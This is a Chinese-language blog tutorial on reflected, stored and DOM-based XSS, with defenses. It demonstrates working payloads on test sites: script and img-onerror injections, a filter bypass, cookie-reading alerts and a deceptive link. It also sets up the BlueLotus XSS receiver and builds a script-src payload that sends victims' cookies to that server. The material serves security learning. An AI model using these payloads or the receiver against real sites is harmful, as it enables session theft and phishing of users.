当前位置： 首页 > news >正文

企业网站模板用哪个,电子商务排名,东莞网络推广案例,网站数据库怎么备份这篇文章旨在用于网络安全学习#xff0c;请勿进行任何非法行为#xff0c;否则后果自负。
环境准备 一、XSS基础 1、反射型XSS 攻击介绍 原理 攻击者通过向目标网站提交包含恶意脚本的请求#xff0c;然后将该恶意脚本注入到响应页面中#xff0c;使其他用户在查看… 这篇文章旨在用于网络安全学习请勿进行任何非法行为否则后果自负。  环境准备 一、XSS基础 1、反射型XSS 攻击介绍 原理 攻击者通过向目标网站提交包含恶意脚本的请求然后将该恶意脚本注入到响应页面中使其他用户在查看包含注入恶意脚本的页面时运行该恶意脚本。 图片来源 使用方法 攻击者构造带有恶意脚本的URL例如通过在URL参数中注入脚本代码。攻击者通过各种方式诱使用户点击或访问包含恶意脚本的URL例如通过钓鱼邮件、社交媒体链接等。用户访问包含恶意脚本的URL时服务器会将URL参数中的恶意脚本代码作为响应页面的一部分返回给用户浏览器。用户浏览器解析响应页面时会执行恶意脚本导致攻击成功。 反射型XSS的前提是目标网站对用户输入的数据没有进行充分的过滤和转义。如果目标网站未对用户输入进行适当的验证和处理并且直接将用户输入的内容显示在响应页面上那么攻击者就能够利用这个漏洞进行反射型XSS攻击。 防御 输入验证和过滤对用户输入的数据进行验证和过滤确保只接收符合预期的数据并拒绝包含恶意脚本的输入。输出转义在将用户输入的内容输出到响应页面之前对特殊字符进行转义例如将转义为、将转义为等阻止恶意脚本的执行。使用HTTP Only Cookie将Cookie标记为HTTP Only以防止通过脚本获取敏感信息。CSPContent Security Policy使用CSP来限制页面中允许执行的内容包括禁止内联脚本如script和限制外部资源加载等。安全编码实践开发人员应遵循安全编码实践包括对用户输入进行正确处理、使用安全的编程语言函数和API等。 定期进行安全审计和漏洞扫描也是非常重要的以确保及时发现和修补潜在的反射型XSS漏洞。 靶场 http://testfire.net  这是一个开源的测试网站攻击这个网站不犯法。 攻击演示 测试网站是否存在反射型xss 口诀见框就插改url参数 随便输入个字符hello、你好啊李银河 继续加个html标签h1 hello 示例 以下是一个示例说明了恶意脚本如何通过注入到请求的参数中进行反射型XSS攻击 假设有一个搜索功能用户可以在搜索框中输入关键字进行搜索。搜索框的值会作为参数传递给服务器进行处理并返回相关的搜索结果。 正常情况下搜索功能的URL可能是这样的 https://example.com/search?keywordmysearch攻击者可以在搜索框中输入恶意脚本作为关键字例如 scriptalert(XSS Attack);/script当用户提交搜索请求时URL会变成这样 https://example.com/search?keywordscriptalert(XSS Attack);/script服务器在处理这个请求时可能没有对输入进行严格的验证和过滤直接将参数中的恶意脚本返回给用户从而导致攻击。用户的浏览器在解析返回的内容时会执行恶意脚本弹出一个警示框。 开始攻击 我这里的跳转url是百度如果是真实的攻击链接链接后面就是一个攻击脚本当然攻击脚本的页面可能是京东、淘宝这些知名网站的登录页面甚至是一些有色网站的登录页面当你输入你的个人隐私信息登录后页面可能就跳转到一个404页面让你稍后在尝试很多人到这里可能就不当回事以为是网站出问题了实际上你的个人信息早就被攻击者收集完了别问我是啥知道的懂的都懂 (¬‿¬) a hrefhttps://www.baidu.com/震惊!88岁中国老太太让全世界膜拜/a 测试到这里我们就可以得出结论这个网站存在反射型xss可以被不法分子利用 如果你需要在输入框执行JS代码则需要写在 script标签内如 scriptalert(hello,zhangsan)/script 代码执行后会出现一个弹框  或者输入img src1 οnerrοralert(1)     # img 是图像标签src填写的是图片路径这里写1路径肯定是不存在的然后就报错error 就是捕获报错的事件on是绑定事件给这个img标签“”后面就可以跟我们要执行的JS代码 当然我刚才的攻击都是输入到搜索框中的读者大大可能会觉得跟我前面说的反射型XSS的原理与示例的攻击方式不一样我们也可以直接在搜索的url参数中写入攻击参数 2、存储型XSS 攻击介绍 原理 攻击者将恶意脚本注入到目标网站的数据库中然后其他用户在访问包含该恶意脚本的页面时从数据库中读取并执行该恶意脚本。 图片来源 使用方法 攻击者找到目标网站上存在漏洞的输入点例如评论框、留言板等。攻击者通过输入恶意脚本代码将该代码存储到目标网站的数据库中。当其他用户访问包含恶意脚本的页面时从数据库中读取并显示该恶意脚本。用户浏览器解析响应页面时会执行恶意脚本导致攻击成功。 存储型XSS的前提是目标网站对用户输入的数据没有进行充分的过滤和转义并且直接将用户输入的内容存储到数据库中然后在页面中读取并显示该内容。 防御 输入验证和过滤对用户输入的数据进行验证和过滤确保只接收符合预期的数据并拒绝包含恶意脚本的输入。输出转义在将用户输入的内容输出到响应页面之前对特殊字符进行转义例如将转义为、将转义为等阻止恶意脚本的执行。输入限制和白名单限制用户输入的内容和格式只允许符合预期的数据并使用白名单来过滤不安全的内容。安全编码实践开发人员应遵循安全编码实践包括对用户输入进行正确处理、使用安全的编程语言函数和API等。安全存储对用户输入的数据在存储时进行额外的处理例如编码、加密或使用安全的存储机制。定期进行安全审计和漏洞扫描以确保及时发现和修补潜在的存储型XSS漏洞。 通过综合以上防御措施可以有效减少存储型XSS攻击的风险。 攻击演示 这里我就使用DVWA靶场做测试 首先把靶场的安全等级调到最低 选择XSS存储 scriptalert(hello,zhangsan)/script scrscriptiptalert(xss)/script 刷新网页之后弹框还是出弹出。如果这个是真实的网站那么我们这个弹框攻击也会影响到其他用户虽然没啥用但是可以恶心人导致其他用户心理不舒服时间久了网站的用户就会自然减少可以说是“损人不利已” 这里一样是可以跟之前的注入攻击一样写入跳转标签的区别是存储型XSS的攻击语句是可以保存在目标网站的数据库中  a hrefhttps://www.baidu.com/震惊!88岁中国老太太让全世界膜拜/a 反射型XSS与存储型XSS的区别 反射型XSS和存储型XSS是两种常见的跨站脚本攻击XSS类型它们之间有以下区别 攻击方式 反射型XSS攻击者将恶意脚本注入到URL参数或表单输入中当用户访问包含恶意脚本的URL或提交包含恶意脚本的表单时恶意脚本会被服务器解析并返回给用户从而导致攻击。存储型XSS攻击者将恶意脚本注入到应用程序的数据库或其他存储介质中当其他用户访问包含恶意脚本的页面时恶意脚本会从服务器中获取并执行从而导致攻击。 注入方式 反射型XSS恶意脚本被注入到请求的参数中服务器将参数中的恶意脚本返回给用户用户的浏览器解析并执行该脚本。存储型XSS恶意脚本被注入到应用程序的数据库或其他存储介质中当其他用户访问包含恶意脚本的页面时服务器从存储介质中获取恶意脚本并返回给用户用户的浏览器解析并执行该脚本。 影响范围 反射型XSS攻击的影响范围通常较小只有在用户访问包含恶意脚本的URL时才会触发攻击。存储型XSS攻击的影响范围较大一旦恶意脚本被存储在服务器上所有访问包含该恶意脚本的页面的用户都会受到攻击。 防御措施 反射型XSS可以通过输入验证和输出编码来防止攻击对用户输入进行严格的过滤和验证将特殊字符进行转义或编码确保用户输入不会被解析为恶意脚本。存储型XSS可以通过输入验证、输出编码和安全的存储来防止攻击对用户输入进行严格的过滤和验证将特殊字符进行转义或编码同时将用户输入的数据存储在安全的方式下如使用预编译语句或存储过程等。 总的来说反射型XSS和存储型XSS都是XSS攻击的不同形式但它们的攻击方式、注入方式和防御措施有所不同。开发人员应该采取综合的安全措施来防止XSS攻击包括输入验证、输出编码和安全的存储等。 3、DOM型XSS 攻击介绍 DOM型XSS是通过修改网页的DOM结构来注入并执行恶意脚本的攻击方式。攻击者利用前端JavaScript代码中存在漏洞的地方通过篡改DOM元素的属性或事件处理程序使浏览器在解析页面时执行恶意脚本。这种攻击类型通常发生在浏览器端对服务器没有直接影响。 原理 攻击者找到目标网页中存在漏洞的JavaScript代码。攻击者使用恶意输入修改DOM元素的属性或事件处理程序。用户在浏览器中打开被篡改的页面时浏览器会解析DOM结构并执行恶意脚本导致攻击成功。 图片来源  使用方法 攻击者识别目标网页中存在漏洞的JavaScript代码。攻击者构造特定的恶意输入并通过修改DOM元素的属性或事件处理程序将恶意脚本注入到目标网页中。用户访问被篡改的页面时恶意脚本被执行。 使用前提 DOM型XSS的使用前提是目标网页中存在可以被攻击者控制或修改的DOM元素通常是由于前端JavaScript代码中存在漏洞导致的。 防御方法 输入验证和过滤对用户输入的数据进行验证和过滤确保只接收符合预期的数据并拒绝包含恶意脚本的输入。输出转义在将用户输入的内容输出到页面中时对特殊字符进行转义避免恶意脚本的执行。安全编码实践开发人员应该编写安全的JavaScript代码避免在DOM操作和事件处理程序中出现漏洞。内容安全策略Content Security PolicyCSP使用CSP设置白名单限制允许加载的资源和执行的脚本以减少攻击面。定期进行安全审计和漏洞扫描以及时发现和修复潜在的DOM型XSS漏洞。 攻击演示 开始测试原来的下拉列表的DOM结构如下图F12可以打开开发者模式查看网页的结构代码 检测网站是否存在XSS的DOM漏洞 scriptalert(test)/script 盗取网站的cookie  scriptalert(document.cookie)/script 二、XSS进阶 相信通过上面的解释大家解决对XSS有个大致的概念了下面介绍XSS的接收平台蓝莲花有首歌也叫这个名字许巍唱的挺好听的。 下载GitHub - firesunCN/BlueLotus_XSSReceiver 安装 1、我这里安装在本地的Phpstudy上这个没啥好说的安装过程就是一路下一步可以改安装路径附上下载链接

官网https://www.xp.cn/download.html

PhpStudy2018

http://public.xp.cn/upgrades/PhpStudy2018.zip# 蓝莲花 - github下载 https://github.com/firesunCN/BlueLotus_XSSReceiver 推荐下载2018版本的操作方便 安装完成后启动服务 将解压后的BlueLotus_XSSReceiver原代码放置 phpstudy 安装目录的WWW文件夹 然后在浏览器中输入http://本机ip/BlueLotus_XSSReceiver-master   #  访问我们刚才拉到www文件夹下的BlueLotus_XSSReceiver文件进入安装界面 2、配置XSS接收平台 - 蓝莲花 插入模板 填写接收数据的url 格式当前蓝莲花平台的url 文件名文件名自己取 示例 最后选择生成paload 测试一下 3、将攻击语句复制保存下来等下要用 script srchttp://127.0.0.1/BlueLotus_XSSReceiver-master/myjs/text.js/script 4、攻击演示 本地演示 突然想到一个问题我刚才制作的攻击语句中的IP是本地的回环地址所以如果我在虚拟机的靶场中测试攻击那么我的蓝莲花平台是接收不到的所以这里先在本地的靶场测试等下在演示在虚拟机中的如果蓝莲花平台部署在云服务器就能攻击其他互联网用户 解除输入框的字符限制 回到平台查看攻击 点击查看邮件信息  虚拟机演示 ipconfig    # 查看本机ip 使用本机IP访问蓝莲花平台测试看看 重新构造攻击paload script srchttp://192.168.100.58//BlueLotus_XSSReceiver-master/myjs/text.js/script 回到平台 这篇文章就到此为止了感觉阅读